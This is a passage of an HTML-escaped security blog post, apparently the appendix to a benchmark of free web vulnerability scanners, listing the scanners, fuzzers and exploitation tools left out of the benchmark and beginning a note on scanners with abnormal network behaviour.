&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Darkjumper 5.8 &lt;/b&gt;(scans additional external hosts that are linked to the given tested host)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Bako&#39;s SQL Injection Scanner&lt;/b&gt; &lt;b&gt;2.2&lt;/b&gt; (only tests sites from a google dork)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Serverchk&lt;/b&gt; (only tests sites from a google dork)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;XSS Scanner by Xylitol&lt;/b&gt; (only tests sites from a google dork)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Hexjector (by hkhexon) &lt;/b&gt;– also falls into other categories&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Deprecated Scanners&lt;/u&gt;&lt;/b&gt; - incomplete tools that were not maintained for a very long time. This list currently includes the following tools (and might include more):&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Wpoison&lt;/b&gt; (development stopped in 2003, the new official version was never released, although the 2002 development version can be obtained by manually composing the sourceforge URL which does not appear in the web site- &lt;a href=&quot;http://sourceforge.net/projects/wpoison/files/&quot;&gt;http://sourceforge.net/projects/wpoison/files/&lt;/a&gt; )&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;De facto Fuzzers&lt;/u&gt;&lt;/b&gt; – tools that scan applications in a similar way to a scanner, but where the scanner attempts to conclude whether or not the application or is vulnerable (according to some sort of “intelligent” set of rules), the fuzzer simply collects abnormal responses to various inputs and behaviors, leaving the task of concluding to the human user.&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Lilith 0.4c/0.6a &lt;/b&gt;(both versions 0.4c and 0.6a were tested, and although the tool seems to be a scanner at first glimpse, it doesn’t perform any intelligent analysis on the results).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Spike proxy&lt;/b&gt; &lt;b&gt;1.48&lt;/b&gt; (although the tool has XSS and SQLi scan features, it acts like a fuzzer more then it acts like a scanner – it sends payloads of partial XSS and SQLi, and does not verify that the context of the returned output is sufficient for execution or that the error presented by the server is related to a database syntax injection, leaving the verification task for the user).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Fuzzers&lt;/u&gt;&lt;/b&gt; – scanning tools that lack the independent ability to conclude whether a given response represents a vulnerable location, by using some sort of verification method (this category includes tools such as JBroFuzz, Firefuzzer, Proxmon, st4lk3r, etc). Fuzzers that had at least one type of exposure that was verified were included in the benchmark (Powerfuzzer).&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;CGI Scanners:&lt;/b&gt; vulnerability scanners that focus on detecting hardening flaws and version specific hazards in web infrastructures (Nikto, Wikto, WHCC, st4lk3r, N-Stealth, etc)&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Single URL Vulnerability Scanners&lt;/u&gt;&lt;/b&gt; - scanners that can only scan one URL at a time, or can only scan information from a google dork (uncontrollable).&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Havij (by itsecteam.com)&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Hexjector (by hkhexon)&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Simple XSS Fuzzer [SiXFu] (by www.EvilFingers.com)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Mysqloit (by muhaimindz)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;PHP Fuzzer (by RoMeO from DarkMindZ)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;SQLi-Scanner (by Valentin Hoebel)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Etc.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;The following scanners&lt;/u&gt;&lt;/b&gt;:&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;sandcatCS 4.0.3.0 &lt;/b&gt;- Since sandcat 4.0 free edition, a more advanced tool from the same vendor is already tested in the benchmark.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;GNUCitizen JAVASCRIPT XSS SCANNER &lt;/b&gt;- since WebSecurify, a more advanced tool from the same vendor is already tested in the benchmark.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Vulnerability Scanner 1.0 (by cmiN, RST) &lt;/b&gt;- since the source code contained traces for remotely downloaded RFI lists from locations that do not exist anymore. I might attempt to test it anyway in the next benchmark.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;XSSRays 0.5.5 - &lt;/b&gt;I might attempt to test it in the next benchmark.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;XSSFuzz 1.1 - &lt;/b&gt;I might attempt to test it in the next benchmark.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;XSS Assistant - &lt;/b&gt;I might attempt to test it in the next benchmark.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Vulnerability Detection Helpers&lt;/u&gt;&lt;/b&gt; – tools that aid in discovering a vulnerability, but do not detect the vulnerability themselves; for example:&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Exploit-Me Suite (XSS-Me, SQL Inject-Me, Access-Me) &lt;/b&gt; &lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Fiddler X5s plugin&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Exploiters&lt;/u&gt; - &lt;/b&gt;tools that can exploit vulnerabilities but have no independent ability to automatically detect vulnerabilities on a large scale. Examples:&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;MultiInjector&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;XSS-Proxy-Scanner&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Pangolin&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;FGInjector&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Absinth&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Safe3 SQL Injector&lt;/b&gt; (an exploitation tool with scanning features (pentest mode) that are &lt;b&gt;not available&lt;/b&gt; in the free version).&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Exceptional Cases&lt;/u&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;SecurityQA Toolbar (iSec)&lt;/b&gt; – various lists and rumors include this tool in the collection of free/open-source vulnerability scanners, but I wasn’t able to obtain it from the vendor’s web site, or from any other legitimate source, so I’m not really sure it fits the “free to use” category.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #999999;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066166&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Appendix B – WAVSEP Scanning Logs&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The execution logs, installation steps and configuration used while scanning with the various tools are all described in the following report (PDF format):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://wavsep.googlecode.com/files/WavsepScanLogs%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/WavsepScanLogs%20v1.0.pdf&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #999999;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066167&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Appendix C – Scanners with Abnormal Behavior&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;During the assessment, parts of the source code of open source scanners and the HTTP communication of some of the scanners was analyzed; some tools behaved in an &lt;b&gt;abnormal&lt;/b&gt; manner that should be reported:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l1 level1 lfo9; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Priamos IP Address Lookup&lt;/i&gt;&lt;/b&gt; – The tool Priamos attempts to access “whatismyip.com” (or some similar site) whenever a scan is initiated (verified by channeling the communication through Burp proxy). This behavior might derive from a trojan horse that infected the content on the project web site, so I’m not jumping to any conclusions just yet.&lt;/li&gt;
